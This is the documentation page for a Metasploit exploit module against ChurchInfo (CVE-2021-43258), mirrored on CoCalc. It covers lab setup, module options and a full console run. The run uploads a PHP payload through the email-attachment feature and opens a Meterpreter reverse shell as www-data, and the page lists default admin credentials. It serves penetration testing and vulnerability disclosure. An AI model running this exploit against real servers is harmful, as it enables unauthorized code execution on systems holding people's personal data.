CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
Views: 1904

Vulnerable Application

ChurchInfo is an open source PHP application used to help churches manage systems and users of the church. There are various vulnerabilities in the ChurchInfo software which can be exploited by an attacker, however this module targets an authenticated remote code execution (RCE) vulnerability known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data).

ChurchInfo v1.2.13, v1.2.14, and v1.3.0 contain functionality to email users listed in the ChurchInfo database with attachments. When preparing the email, a draft of the attachment is saved into /tmp_attach/, which is a web accessible folder under the ChurchInfo web root. Before the email is sent, the attachment draft can be loaded in the application. By uploading a malicious PHP file as an attachment and then browsing to it on the web server, RCE can be achieved.

This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest version of ChurchInfo at the time of writing and there is presently no known patch for this issue.

Installation

Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/.

The following however is a quick and easy way to get most versions of ChurchInfo up and running using Docker, which should make it a lot easier to setup and also clean up once you are finished testing things out.

  1. wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz

  2. tar -xvf churchinfo-1.3.0.tar.gz

  3. sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7.

  4. sudo docker ps -a and find the container ID that was created and which is now running.

  5. sudo docker exec -it *container ID* /bin/bash

  6. Inside the new prompt:

  7. mysqladmin -u root -p create churchinfo and press the ENTER key when prompted for the password.

  8. cd /app/churchinfo/SQL

  9. mysql -u root -p churchinfo < Install.sql and press the ENTER key when prompted for the password.

  10. apt-get install nano if you want to use Nano.

  11. nano /app/churchinfo/Include/Config.php.

  12. Set the $sUSER variable to 'root'.

  13. Set the $sPASSWORD variable to ''.

  14. Set the $sRootPath variable to '/churchinfo'. This should be default though.

  15. Set the $URL[0] to http://localhost/churchinfo/Default.php.

  16. Exit out of nano and run /etc/init.d/apache2 restart

  17. Log in at http://127.0.0.1:9090/churchinfo/Default.php with the username Admin and password churchinfoadmin.

  18. This should cause the app to redirect to a password change form.

  19. Specify the old password, aka churchinfoadmin and then specify the new password twice and submit the form.

  20. Go to http://127.0.0.1:9090/churchinfo/PersonEditor.php and fill out the form with as much detail as possible.

  21. Click "Save and Add".

Verification Steps

This module requires authenticated access to the application. After identifying a vulnerable ChurchInfo application, there MUST be a person entry available within the database. If there are no person entries within the database, it will not be possible to create a draft email. This draft email will be used to place the malicious attachment into the /tmp_attach directory for our exploit.

  1. Start msfconsole

  2. use exploit/multi/http/churchinfo_upload_exec

  3. Set the target RHOST, APPBASE, USERNAME, and PASSWORD values.

  4. Optional: Set the target RPORT if the ChurchInfo server is running on a different port than port 80.

  5. Optional: set SSL true if the target is using SSL for ChurchInfo.

  6. Select the payload of choice or leave default.

  7. Set the LHOST to your system.

  8. Run the exploit with run, enjoy the shell!

Options

There are a handful of options which can be used to further configure the attack or other environmental uses.

USERNAME

The username of a valid user account for the ChurchInfo application. Default is admin.

PASSWORD

The password for a valid user account for the ChurchInfo application. Default is churchinfoadmin based on documentation.

APPBASE

The base directory path to the ChurchInfo application. This can and will likely vary depending on how the application was installed. Default value is /churchinfo/.

EMAIL_SUBJ

The subject of the draft email used for the exploit, the email is not sent. Default value is Read this now!.

EMAIL_MESG

The message on the draft email which is used for the exploit. The email is not sent. Default value is Hello there!.

Scenarios

If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:

set verbose true

This will enable additional information and details about the exploit as it is launched.

ChurchInfo v1.3.0 with MySQL 5.7.35 on Ubuntu Linux 18.04.2 LTS (Docker Image)

msf6 > use exploit/multi/http/churchinfo_upload_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/churchinfo_upload_exec) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/churchinfo_upload_exec) > set RPORT 9090
RPORT => 9090
msf6 exploit(multi/http/churchinfo_upload_exec) > set PASSWORD testing123
PASSWORD => testing123
msf6 exploit(multi/http/churchinfo_upload_exec) > show options

Module options (exploit/multi/http/churchinfo_upload_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EMAIL_MESG  Hello there!     yes       Email message in webapp
   EMAIL_SUBJ  Read this now!   yes       Email subject in webapp
   PASSWORD    testing123       yes       Password to login with
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       9090             yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /churchinfo/     yes       The location of the ChurchInfo app
   USERNAME    admin            yes       Username for ChurchInfo application
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.30.182.196   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0
LHOST => docker0
msf6 exploit(multi/http/churchinfo_upload_exec) > run

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Target is ChurchInfo!
[+] The target is vulnerable. Target is running ChurchInfo 1.3.0!
[+] Logged into application as admin
[*] Navigating to add items to cart
[+] Items in Cart: Items in Cart: 2
[+] Uploading exploit via temp email attachment
[+] Exploit uploaded to /churchinfo/tmp_attach/ueNYs9.php
[+] Executing payload with GET request
[*] Sending stage (39927 bytes) to 172.18.0.2
[+] Deleted ueNYs9.php
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:37790) at 2022-11-18 17:44:31 -0600


meterpreter > getpid
Current pid: 452
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 8eeaa82293b4
OS          : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter >